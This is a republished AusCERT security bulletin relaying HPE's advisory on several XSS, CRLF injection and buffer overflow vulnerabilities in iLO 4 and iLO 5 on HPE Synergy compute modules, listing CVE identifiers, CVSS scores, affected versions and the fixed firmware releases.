CVE Names: CVE-2021-29211 CVE-2021-29210 CVE-2021-29209
CVE-2021-29208 CVE-2021-29207 CVE-2021-29206
CVE-2021-29205 CVE-2021-29204 CVE-2021-29202
CVE-2021-29201

Original Bulletin:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbhf04130en_us

– ————————–BEGIN INCLUDED TEXT——————–

SECURITY BULLETIN

Document ID: hpesbhf04130en_us

Version: 2

HPESBHF04130 rev.2 – HPE Synergy Systems with Integrated Lights-Out 5 (iLO 5)
and Integrated Lights-Out 4 (iLO 4), Multiple Remote and Local Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon
as possible.

Release Date: 2021-05-18
Last Updated: 2021-06-01

Potential Security Impact:
– Local : Buffer Overflow;
– Remote: Cross-Site Scripting (XSS), Carriage Return Line Feed (CRLF) Injection

Source: Hewlett Packard Enterprise, HPE Product Security Response Team

VULNERABILITY SUMMARY
Multiple potential security vulnerabilities have been identified in HPE
Integrated Lights-Out 5 (iLO 5), and HPE Integrated Lights-Out 4 (iLO 4). The
vulnerabilities are XSS, CR-LF injection, DOM XSS and several buffer overflow
vulnerabilities. The XSS, CR-LF injection and DOM XSS are against authenticated
privileged iLO users of the iLO web interface. The iLO buffer overflow
vulnerabilities can be exploited by a privileged user on a host OS to execute code
on the iLO as a privileged user.

References:
CVE-2021-29201 – XSS
CVE-2021-29204 – XSS
CVE-2021-29205 – XSS
CVE-2021-29206 – XSS
CVE-2021-29207 – XSS
CVE-2021-29211 – XSS
CVE-2021-29202 – local buffer overflow
CVE-2021-29208 – DOM XSS, CRLF injection
CVE-2021-29209 – DOM XSS, CRLF injection
CVE-2021-29210 – DOM XSS, CRLF injection

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HPE Synergy 480 Gen9 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01
HPE Synergy 480 Gen10 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01
HPE Synergy 620 Gen9 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01
HPE Synergy 660 Gen9 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01
HPE Synergy 660 Gen10 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01
HPE Synergy 680 Gen9 Compute Module – Prior to HPE Synergy Service Pack (SSP) 2021.05.01

BACKGROUND
HPE calculates CVSS using CVSS Version 3.1. If the score is provided from NIST,
we will display Version 2.0, 3.0, or 3.1 as provided from NVD.

Reference, V3 Vector, V3 Base Score, V2 Vector, V2 Base Score

CVE-2021-29201 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

CVE-2021-29202 CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L 6.4 (AV:L/AC:H/Au:M/C:C/I:C/A:C) 5.9

CVE-2021-29204 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

CVE-2021-29205 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

CVE-2021-29206 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

CVE-2021-29207 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

CVE-2021-29208 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H 7.6 (AV:N/AC:H/Au:S/C:C/I:C/A:C) 7.1

CVE-2021-29209 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H 7.6 (AV:N/AC:H/Au:S/C:C/I:C/A:C) 7.1

CVE-2021-29210 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H 7.6 (AV:N/AC:H/Au:S/C:C/I:C/A:C) 7.1

CVE-2021-29211 CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:L 3.1 (AV:N/AC:H/Au:M/C:N/I:P/A:P) 3.2

Information on CVSS is documented in HPE Customer Notice: HPSN-2008-002
Hewlett Packard Enterprise acknowledges Fabien Perigaud of Synacktiv and Alexandre
Gazet of Airbus Security Team for reporting CVE-2021-29202 to security-alert@hpe.com.

Hewlett Packard Enterprise acknowledges Tomasz Holeksa for reporting
CVE-2021-29201, CVE-2021-29204, CVE-2021-29205, CVE-2021-29206, CVE-2021-29207
to security-alert@hpe.com.

Hewlett Packard Enterprise acknowledges Kajetan Rostojek for reporting
CVE-2021-29208, CVE-2021-29209, CVE-2021-29210 to security-alert@hpe.com.

RESOLUTION
HPE has made the software update to resolve the vulnerabilities in HPE
Integrated Lights-Out 5 (iLO 5) version 2.44 or later, and HPE Integrated
Lights-Out4 (iLO 4) version 2.78 or later.

Please visit the HPE Support Center to download the latest HPE Synergy
Service Pack (SSP) containing these versions:

HPE Synergy Service Pack (SSP) 2021.05.01.
To apply this vulnerability resolution to prior HPE Synergy Custom SPPs under
active support, please see the following customer advisory with detailed
compatibility information and installation instructions.

https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00114985en_us

NOTE: Beginning in May 2021, HPE Synergy Software Releases will adopt a new
naming policy for firmware bundles, previously referred to as HPE Synergy
Custom SPPs. Future releases will transition to the new naming, HPE Synergy
Service Pack (SSP).

HISTORY
Version:1 (rev.1) – 18 May 2021 Initial release
Version:2 (rev.2) – 1 June 2021 Update “To apply this vulnerability resolution
to prior HPE Synergy Custom SPPs under active support, please see the following
customer advisory with detailed compatibility information and installation
instructions.”

– ————————–END INCLUDED TEXT——————–

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
—–BEGIN PGP SIGNATURE—–
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBYLmrJ+NLKJtyKPYoAQhI/xAAhI363XLIzmWF1k19ahx8eIYvizSh4Fys
CAfex/CRml0uH51g/Ts2snj4bjI+MST7aqv9CYhN0Zr1XJ2vJRXLfXpClohfSzQ+
ChxuGxbD6pr1a8ezc6z66pBH2M93SLxtZ9iP7pz2ylLbbTF1BqMDqFyiOYf4fbTD
FHW+IbUh0RS51nBjM/UdxZWN1+LXMBu9MhvpWw32olc5BJQ9a3eHG5QmcvrgCFXh
IXR+Tyo0NIkXAl5YaTA68oy32EL9dQiwuTHkNOO6cn7F7XN+w3hDp/F9GX60bkKS
GeD1SZQcvV1II3DlWIaM+uD2F/mfLHIDIQab9FKSaMcy5/tkaAI6MlE2srFIMU/f
6MEKjlXmuBiD5vRtMcbZ7Ub7XcTOOOyOOk6UGgOKA0pG89EDsFljhCSb8t29ZxAS
Su590kq0bDESwPtMU0xZjdskkYggJRkT6M65lcwtk+z4NM1wsN7ZyYyAZbGAF9s8
VBt5LJKFygndemTXZRvoTaQGLCYK5zwj4W3Lf2+yvV+JPamgEPPzC7zUpHS5+Na+
HzxbNdt0NonWrQcG2lZzzdC/sCVcpzthy1KiLykD83/znTUAW0eP42D/+ff/wtZI
hACUPR8z2HH0QurM2EnNL9JYACMSPegpmDEkkAkZV+qnnpfDc7dgOFK3pIM0nseP
HGcjhKZy2gw=
=EuD+
—–END PGP SIGNATURE—–

Read More

The post ESB-2021.1954 – [Appliance] HPE Synergy: Multiple vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2021/06/04/esb-2021-1954-appliance-hpe-synergy-multiple-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1954-appliance-hpe-synergy-multiple-vulnerabilities

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...